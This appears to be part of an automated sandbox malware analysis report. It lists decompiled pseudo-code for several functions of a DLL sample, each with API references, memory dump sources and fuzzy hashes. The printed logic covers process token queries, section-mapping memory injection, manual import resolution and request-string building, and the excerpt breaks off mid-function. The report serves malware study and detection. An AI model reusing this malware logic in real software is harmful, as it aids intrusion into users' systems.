                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 71db3f6384662438569d6779dcdfed94a5d4a2fd1970f8467fd7589798aeab48
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F2311C71A40209EFEB11EF69DC81A6EF7F9EF48780F214869E905E7210D730E9558B11
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    C-Code - Quality: 38%
                                                                                                                                                                                                                                    			E02F983B7(char _a4, void* _a8) {
                                                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                                                    				void* _v12;
                                                                                                                                                                                                                                    				char _v16;
                                                                                                                                                                                                                                    				void* _v20;
                                                                                                                                                                                                                                    				char _v24;
                                                                                                                                                                                                                                    				char _v28;
                                                                                                                                                                                                                                    				char _v32;
                                                                                                                                                                                                                                    				char _v36;
                                                                                                                                                                                                                                    				char _v40;
                                                                                                                                                                                                                                    				void* _v44;
                                                                                                                                                                                                                                    				void** _t33;
                                                                                                                                                                                                                                    				void* _t40;
                                                                                                                                                                                                                                    				void* _t43;
                                                                                                                                                                                                                                    				void** _t44;
                                                                                                                                                                                                                                    				intOrPtr* _t47;
                                                                                                                                                                                                                                    				char _t48;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                    				_v20 = _a4;
                                                                                                                                                                                                                                    				_t48 = 0;
                                                                                                                                                                                                                                    				_v16 = 0;
                                                                                                                                                                                                                                    				_a4 = 0;
                                                                                                                                                                                                                                    				_v44 = 0x18;
                                                                                                                                                                                                                                    				_v40 = 0;
                                                                                                                                                                                                                                    				_v32 = 0;
                                                                                                                                                                                                                                    				_v36 = 0;
                                                                                                                                                                                                                                    				_v28 = 0;
                                                                                                                                                                                                                                    				_v24 = 0;
                                                                                                                                                                                                                                    				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
                                                                                                                                                                                                                                    					_t33 =  &_v8;
                                                                                                                                                                                                                                    					__imp__(_v12, 8, _t33);
                                                                                                                                                                                                                                    					if(_t33 >= 0) {
                                                                                                                                                                                                                                    						_t47 = __imp__;
                                                                                                                                                                                                                                    						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
                                                                                                                                                                                                                                    						_t44 = E02F92049(_a4);
                                                                                                                                                                                                                                    						if(_t44 != 0) {
                                                                                                                                                                                                                                    							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
                                                                                                                                                                                                                                    							if(_t40 >= 0) {
                                                                                                                                                                                                                                    								memcpy(_a8,  *_t44, 0x1c);
                                                                                                                                                                                                                                    								_t48 = 1;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							E02F99039(_t44);
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						NtClose(_v8); // executed
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					NtClose(_v12);
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return _t48;
                                                                                                                                                                                                                                    			}




















                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 02F983FE
                                                                                                                                                                                                                                    • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 02F98411
                                                                                                                                                                                                                                    • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 02F9842D
                                                                                                                                                                                                                                      • Part of subcall function 02F92049: RtlAllocateHeap.NTDLL(00000000,00000000,02F97E50), ref: 02F92055
                                                                                                                                                                                                                                    • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 02F9844A
                                                                                                                                                                                                                                    • memcpy.NTDLL(00000000,00000000,0000001C), ref: 02F98457
                                                                                                                                                                                                                                    • NtClose.NTDLL(?), ref: 02F98469
                                                                                                                                                                                                                                    • NtClose.NTDLL(00000000), ref: 02F98473
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2575439697-0
                                                                                                                                                                                                                                    • Opcode ID: c6a6e850460f9a648027d9bb6105496546d0b19c0e7efb462de12bb7935b89a6
                                                                                                                                                                                                                                    • Instruction ID: 90fce6438f055e7ac5e35e970b7ed09552c81ecbbf66241b6143c8063bcb3345
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c6a6e850460f9a648027d9bb6105496546d0b19c0e7efb462de12bb7935b89a6
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4A21D4B294021CBBEF119FA5CC45ADEBFBDEF19B94F104026FA04E6120D7719A549FA0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 72%
                                                                                                                                                                                                                                    			E00401EB5(intOrPtr* __eax, void** _a4) {
                                                                                                                                                                                                                                    				int _v12;
                                                                                                                                                                                                                                    				void* _v16;
                                                                                                                                                                                                                                    				void* _v20;
                                                                                                                                                                                                                                    				void* _v24;
                                                                                                                                                                                                                                    				int _v28;
                                                                                                                                                                                                                                    				int _v32;
                                                                                                                                                                                                                                    				intOrPtr _v36;
                                                                                                                                                                                                                                    				int _v40;
                                                                                                                                                                                                                                    				int _v44;
                                                                                                                                                                                                                                    				void* _v48;
                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                    				long _t34;
                                                                                                                                                                                                                                    				void* _t39;
                                                                                                                                                                                                                                    				void* _t47;
                                                                                                                                                                                                                                    				intOrPtr* _t48;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t48 = __eax;
                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                    				_v24 =  *((intOrPtr*)(__eax + 4));
                                                                                                                                                                                                                                    				_v16 = 0;
                                                                                                                                                                                                                                    				_v12 = 0;
                                                                                                                                                                                                                                    				_v48 = 0x18;
                                                                                                                                                                                                                                    				_v44 = 0;
                                                                                                                                                                                                                                    				_v36 = 0x40;
                                                                                                                                                                                                                                    				_v40 = 0;
                                                                                                                                                                                                                                    				_v32 = 0;
                                                                                                                                                                                                                                    				_v28 = 0;
                                                                                                                                                                                                                                    				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
                                                                                                                                                                                                                                    				if(_t34 < 0) {
                                                                                                                                                                                                                                    					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					 *_t48 = _v16;
                                                                                                                                                                                                                                    					_t39 = E00401D9F(_t48,  &_v12); // executed
                                                                                                                                                                                                                                    					_t47 = _t39;
                                                                                                                                                                                                                                    					if(_t47 != 0) {
                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						memset(_v12, 0, _v24);
                                                                                                                                                                                                                                    						 *_a4 = _v12;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return _t47;
                                                                                                                                                                                                                                    			}


















                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,76D24EE0,00000000,00000000,?), ref: 00401F12
                                                                                                                                                                                                                                      • Part of subcall function 00401D9F: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,00401F27,00000002,00000000,?,?,00000000,?,?,00401F27,00000002), ref: 00401DCC
                                                                                                                                                                                                                                    • memset.NTDLL ref: 00401F34
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.512650162.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.512935351.0000000000405000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_loaddll32.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Section$CreateViewmemset
                                                                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                                                                    • API String ID: 2533685722-2766056989
                                                                                                                                                                                                                                    • Opcode ID: ee04d3b80f2aa96c2028224801f0ff00ef799990c629de64b363f9b0c8c139ed
                                                                                                                                                                                                                                    • Instruction ID: 68d8c8f26fc330075f7cb601c6588f33ac635daa3c13fb39122687157e3906a1
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ee04d3b80f2aa96c2028224801f0ff00ef799990c629de64b363f9b0c8c139ed
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 92211DB1D00209AFDB11DFA9C8849EEFBB9FF48354F10447AE606F3250D734AA498B64
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E00401745(void* __edi, intOrPtr _a4) {
                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                    				intOrPtr* _v12;
                                                                                                                                                                                                                                    				_Unknown_base(*)()** _v16;
                                                                                                                                                                                                                                    				signed int _v20;
                                                                                                                                                                                                                                    				signed short _v24;
                                                                                                                                                                                                                                    				struct HINSTANCE__* _v28;
                                                                                                                                                                                                                                    				intOrPtr _t43;
                                                                                                                                                                                                                                    				intOrPtr* _t45;
                                                                                                                                                                                                                                    				intOrPtr _t46;
                                                                                                                                                                                                                                    				struct HINSTANCE__* _t47;
                                                                                                                                                                                                                                    				intOrPtr* _t49;
                                                                                                                                                                                                                                    				intOrPtr _t50;
                                                                                                                                                                                                                                    				signed short _t51;
                                                                                                                                                                                                                                    				_Unknown_base(*)()* _t53;
                                                                                                                                                                                                                                    				CHAR* _t54;
                                                                                                                                                                                                                                    				_Unknown_base(*)()* _t55;
                                                                                                                                                                                                                                    				void* _t58;
                                                                                                                                                                                                                                    				signed int _t59;
                                                                                                                                                                                                                                    				_Unknown_base(*)()* _t60;
                                                                                                                                                                                                                                    				intOrPtr _t61;
                                                                                                                                                                                                                                    				intOrPtr _t65;
                                                                                                                                                                                                                                    				signed int _t68;
                                                                                                                                                                                                                                    				void* _t69;
                                                                                                                                                                                                                                    				CHAR* _t71;
                                                                                                                                                                                                                                    				signed short* _t73;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t69 = __edi;
                                                                                                                                                                                                                                    				_v20 = _v20 & 0x00000000;
                                                                                                                                                                                                                                    				_t59 =  *0x40414c;
                                                                                                                                                                                                                                    				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x1b4cdd98));
                                                                                                                                                                                                                                    				if(_t43 != 0) {
                                                                                                                                                                                                                                    					_t45 = _t43 + __edi;
                                                                                                                                                                                                                                    					_v12 = _t45;
                                                                                                                                                                                                                                    					_t46 =  *((intOrPtr*)(_t45 + 0xc));
                                                                                                                                                                                                                                    					if(_t46 != 0) {
                                                                                                                                                                                                                                    						while(1) {
                                                                                                                                                                                                                                    							_t71 = _t46 + _t69;
                                                                                                                                                                                                                                    							_t47 = LoadLibraryA(_t71); // executed
                                                                                                                                                                                                                                    							_v28 = _t47;
                                                                                                                                                                                                                                    							if(_t47 == 0) {
                                                                                                                                                                                                                                    								break;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							_v24 = _v24 & 0x00000000;
                                                                                                                                                                                                                                    							 *_t71 = _t59 - 0x63699bc3;
                                                                                                                                                                                                                                    							_t49 = _v12;
                                                                                                                                                                                                                                    							_t61 =  *((intOrPtr*)(_t49 + 0x10));
                                                                                                                                                                                                                                    							_t50 =  *_t49;
                                                                                                                                                                                                                                    							if(_t50 != 0) {
                                                                                                                                                                                                                                    								L6:
                                                                                                                                                                                                                                    								_t73 = _t50 + _t69;
                                                                                                                                                                                                                                    								_v16 = _t61 + _t69;
                                                                                                                                                                                                                                    								while(1) {
                                                                                                                                                                                                                                    									_t51 =  *_t73;
                                                                                                                                                                                                                                    									if(_t51 == 0) {
                                                                                                                                                                                                                                    										break;
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    									if(__eflags < 0) {
                                                                                                                                                                                                                                    										__eflags = _t51 - _t69;
                                                                                                                                                                                                                                    										if(_t51 < _t69) {
                                                                                                                                                                                                                                    											L12:
                                                                                                                                                                                                                                    											_t21 =  &_v8;
                                                                                                                                                                                                                                    											 *_t21 = _v8 & 0x00000000;
                                                                                                                                                                                                                                    											__eflags =  *_t21;
                                                                                                                                                                                                                                    											_v24 =  *_t73 & 0x0000ffff;
                                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                                    											_t65 = _a4;
                                                                                                                                                                                                                                    											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
                                                                                                                                                                                                                                    											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
                                                                                                                                                                                                                                    												goto L12;
                                                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                                                    												goto L11;
                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                    										_t51 = _t51 + _t69;
                                                                                                                                                                                                                                    										L11:
                                                                                                                                                                                                                                    										_v8 = _t51;
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    									_t53 = _v8;
                                                                                                                                                                                                                                    									__eflags = _t53;
                                                                                                                                                                                                                                    									if(_t53 == 0) {
                                                                                                                                                                                                                                    										_t54 = _v24 & 0x0000ffff;
                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                    										_t54 = _t53 + 2;
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    									_t55 = GetProcAddress(_v28, _t54);
                                                                                                                                                                                                                                    									__eflags = _t55;
                                                                                                                                                                                                                                    									if(__eflags == 0) {
                                                                                                                                                                                                                                    										_v20 = _t59 - 0x63699b44;
                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                    										_t68 = _v8;
                                                                                                                                                                                                                                    										__eflags = _t68;
                                                                                                                                                                                                                                    										if(_t68 != 0) {
                                                                                                                                                                                                                                    											 *_t68 = _t59 - 0x63699bc3;
                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                    										 *_v16 = _t55;
                                                                                                                                                                                                                                    										_t58 = 0x725990f8 + _t59 * 4;
                                                                                                                                                                                                                                    										_t73 = _t73 + _t58;
                                                                                                                                                                                                                                    										_t32 =  &_v16;
                                                                                                                                                                                                                                    										 *_t32 = _v16 + _t58;
                                                                                                                                                                                                                                    										__eflags =  *_t32;
                                                                                                                                                                                                                                    										continue;
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    									goto L23;
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                    								_t50 = _t61;
                                                                                                                                                                                                                                    								if(_t61 != 0) {
                                                                                                                                                                                                                                    									goto L6;
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							L23:
                                                                                                                                                                                                                                    							_v12 = _v12 + 0x14;
                                                                                                                                                                                                                                    							_t46 =  *((intOrPtr*)(_v12 + 0xc));
                                                                                                                                                                                                                                    							if(_t46 != 0) {
                                                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							L26:
                                                                                                                                                                                                                                    							goto L27;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t60 = _t59 + 0x9c9664bb;
                                                                                                                                                                                                                                    						__eflags = _t60;
                                                                                                                                                                                                                                    						_v20 = _t60;
                                                                                                                                                                                                                                    						goto L26;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				L27:
                                                                                                                                                                                                                                    				return _v20;
                                                                                                                                                                                                                                    			}




























                                                                                                                                                                                                                                    0x004017a4
                                                                                                                                                                                                                                    0x004017ac
                                                                                                                                                                                                                                    0x004017ae
                                                                                                                                                                                                                                    0x004017b1
                                                                                                                                                                                                                                    0x00401819
                                                                                                                                                                                                                                    0x00401819
                                                                                                                                                                                                                                    0x0040181d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004017b6
                                                                                                                                                                                                                                    0x004017bc
                                                                                                                                                                                                                                    0x004017be
                                                                                                                                                                                                                                    0x004017d1
                                                                                                                                                                                                                                    0x004017d4
                                                                                                                                                                                                                                    0x004017d4
                                                                                                                                                                                                                                    0x004017d4
                                                                                                                                                                                                                                    0x004017d8
                                                                                                                                                                                                                                    0x004017c0
                                                                                                                                                                                                                                    0x004017c0
                                                                                                                                                                                                                                    0x004017c8
                                                                                                                                                                                                                                    0x004017ca
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004017ca
                                                                                                                                                                                                                                    0x004017b8
                                                                                                                                                                                                                                    0x004017b8
                                                                                                                                                                                                                                    0x004017cc
                                                                                                                                                                                                                                    0x004017cc
                                                                                                                                                                                                                                    0x004017cc
                                                                                                                                                                                                                                    0x004017db
                                                                                                                                                                                                                                    0x004017de
                                                                                                                                                                                                                                    0x004017e0
                                                                                                                                                                                                                                    0x004017e7
                                                                                                                                                                                                                                    0x004017e2
                                                                                                                                                                                                                                    0x004017e2
                                                                                                                                                                                                                                    0x004017e2
                                                                                                                                                                                                                                    0x004017ef
                                                                                                                                                                                                                                    0x004017f5
                                                                                                                                                                                                                                    0x004017f7
                                                                                                                                                                                                                                    0x00401827
                                                                                                                                                                                                                                    0x004017f9
                                                                                                                                                                                                                                    0x004017f9
                                                                                                                                                                                                                                    0x004017fc
                                                                                                                                                                                                                                    0x004017fe
                                                                                                                                                                                                                                    0x00401806
                                                                                                                                                                                                                                    0x00401806
                                                                                                                                                                                                                                    0x0040180b
                                                                                                                                                                                                                                    0x0040180d
                                                                                                                                                                                                                                    0x00401814
                                                                                                                                                                                                                                    0x00401816
                                                                                                                                                                                                                                    0x00401816
                                                                                                                                                                                                                                    0x00401816
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00401816
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004017f7
                                                                                                                                                                                                                                    0x004017a6
                                                                                                                                                                                                                                    0x004017a8
                                                                                                                                                                                                                                    0x004017aa
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004017aa
                                                                                                                                                                                                                                    0x0040182a
                                                                                                                                                                                                                                    0x0040182a
                                                                                                                                                                                                                                    0x00401831
                                                                                                                                                                                                                                    0x00401836
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040183c
                                                                                                                                                                                                                                    0x00401847
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00401847
                                                                                                                                                                                                                                    0x0040183e
                                                                                                                                                                                                                                    0x0040183e
                                                                                                                                                                                                                                    0x00401844
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00401844
                                                                                                                                                                                                                                    0x00401772
                                                                                                                                                                                                                                    0x00401848
                                                                                                                                                                                                                                    0x0040184d

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 0040177D
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 004017EF
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.512650162.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.512935351.0000000000405000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_loaddll32.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2574300362-0
                                                                                                                                                                                                                                    • Opcode ID: 490eff7fe5a53a3882690b0df239dd75a7ddff08e9cfbb9678ceef9e68b9057d
                                                                                                                                                                                                                                    • Instruction ID: 20e41381af83e98fed74a613c3f7ab7ed5ea214225131684d0572623078a26fe
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 490eff7fe5a53a3882690b0df239dd75a7ddff08e9cfbb9678ceef9e68b9057d
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A2310C76A0020A9FDB15CF59C980AAEB7F4BF45315F24807AD805F73A0E778DA41DB58
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 68%
                                                                                                                                                                                                                                    			E00401D9F(void** __esi, PVOID* _a4) {
                                                                                                                                                                                                                                    				long _v8;
                                                                                                                                                                                                                                    				void* _v12;
                                                                                                                                                                                                                                    				void* _v16;
                                                                                                                                                                                                                                    				long _t13;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_v16 = 0;
                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                                                                    				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
                                                                                                                                                                                                                                    				if(_t13 < 0) {
                                                                                                                                                                                                                                    					_push(_t13);
                                                                                                                                                                                                                                    					return __esi[6]();
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return 0;
                                                                                                                                                                                                                                    			}








                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,00401F27,00000002,00000000,?,?,00000000,?,?,00401F27,00000002), ref: 00401DCC
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.512650162.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.512935351.0000000000405000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_loaddll32.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: SectionView
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1323581903-0
                                                                                                                                                                                                                                    • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                                                                                                                                                                                                                    • Instruction ID: d47de4e0d58a28ad62aca0fe1954c9537e19fd45f2cb1026219e244723f4612c
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 79F012B590020CBFDB119FA5CC85C9FBBBDEB44358F10497AB152E10A0D630AE089A60
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    C-Code - Quality: 74%
                                                                                                                                                                                                                                    			E02F98B94(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
                                                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                                    				void* _v16;
                                                                                                                                                                                                                                    				void* _v20;
                                                                                                                                                                                                                                    				void* _v24;
                                                                                                                                                                                                                                    				void* _v28;
                                                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                                                    				long _t59;
                                                                                                                                                                                                                                    				intOrPtr _t60;
                                                                                                                                                                                                                                    				intOrPtr _t61;
                                                                                                                                                                                                                                    				intOrPtr _t62;
                                                                                                                                                                                                                                    				intOrPtr _t63;
                                                                                                                                                                                                                                    				intOrPtr _t64;
                                                                                                                                                                                                                                    				void* _t67;
                                                                                                                                                                                                                                    				intOrPtr _t68;
                                                                                                                                                                                                                                    				int _t71;
                                                                                                                                                                                                                                    				void* _t72;
                                                                                                                                                                                                                                    				void* _t73;
                                                                                                                                                                                                                                    				void* _t75;
                                                                                                                                                                                                                                    				void* _t78;
                                                                                                                                                                                                                                    				intOrPtr _t82;
                                                                                                                                                                                                                                    				intOrPtr _t86;
                                                                                                                                                                                                                                    				intOrPtr* _t88;
                                                                                                                                                                                                                                    				void* _t94;
                                                                                                                                                                                                                                    				intOrPtr _t101;
                                                                                                                                                                                                                                    				signed int _t105;
                                                                                                                                                                                                                                    				char** _t107;
                                                                                                                                                                                                                                    				int _t110;
                                                                                                                                                                                                                                    				signed int _t112;
                                                                                                                                                                                                                                    				intOrPtr* _t113;
                                                                                                                                                                                                                                    				intOrPtr* _t115;
                                                                                                                                                                                                                                    				intOrPtr* _t117;
                                                                                                                                                                                                                                    				intOrPtr* _t119;
                                                                                                                                                                                                                                    				intOrPtr _t122;
                                                                                                                                                                                                                                    				intOrPtr _t127;
                                                                                                                                                                                                                                    				int _t131;
                                                                                                                                                                                                                                    				CHAR* _t133;
                                                                                                                                                                                                                                    				intOrPtr _t134;
                                                                                                                                                                                                                                    				void* _t135;
                                                                                                                                                                                                                                    				void* _t144;
                                                                                                                                                                                                                                    				int _t145;
                                                                                                                                                                                                                                    				void* _t146;
                                                                                                                                                                                                                                    				intOrPtr _t147;
                                                                                                                                                                                                                                    				void* _t149;
                                                                                                                                                                                                                                    				long _t153;
                                                                                                                                                                                                                                    				intOrPtr* _t154;
                                                                                                                                                                                                                                    				intOrPtr* _t155;
                                                                                                                                                                                                                                    				intOrPtr* _t158;
                                                                                                                                                                                                                                    				void* _t159;
                                                                                                                                                                                                                                    				void* _t161;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t144 = __edx;
                                                                                                                                                                                                                                    				_t135 = __ecx;
                                                                                                                                                                                                                                    				_t59 = __eax;
                                                                                                                                                                                                                                    				_v12 = 8;
                                                                                                                                                                                                                                    				if(__eax == 0) {
                                                                                                                                                                                                                                    					_t59 = GetTickCount();
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t60 =  *0x2f9d018; // 0x99d5691b
                                                                                                                                                                                                                                    				asm("bswap eax");
                                                                                                                                                                                                                                    				_t61 =  *0x2f9d014; // 0x3a87c8cd
                                                                                                                                                                                                                                    				_t133 = _a16;
                                                                                                                                                                                                                                    				asm("bswap eax");
                                                                                                                                                                                                                                    				_t62 =  *0x2f9d010; // 0xd8d2f808
                                                                                                                                                                                                                                    				asm("bswap eax");
                                                                                                                                                                                                                                    				_t63 =  *0x2f9d00c; // 0x62819102
                                                                                                                                                                                                                                    				asm("bswap eax");
                                                                                                                                                                                                                                    				_t64 =  *0x2f9d27c; // 0x44a5a8
                                                                                                                                                                                                                                    				_t3 = _t64 + 0x2f9e633; // 0x74666f73
                                                                                                                                                                                                                                    				_t145 = wsprintfA(_t133, _t3, 3, 0x3d14b, _t63, _t62, _t61, _t60,  *0x2f9d02c,  *0x2f9d004, _t59);
                                                                                                                                                                                                                                    				_t67 = E02F91C1A();
                                                                                                                                                                                                                                    				_t68 =  *0x2f9d27c; // 0x44a5a8
                                                                                                                                                                                                                                    				_t4 = _t68 + 0x2f9e673; // 0x74707526
                                                                                                                                                                                                                                    				_t71 = wsprintfA(_t145 + _t133, _t4, _t67);
                                                                                                                                                                                                                                    				_t161 = _t159 + 0x38;
                                                                                                                                                                                                                                    				_t146 = _t145 + _t71; // executed
                                                                                                                                                                                                                                    				_t72 = E02F954BC(_t135); // executed
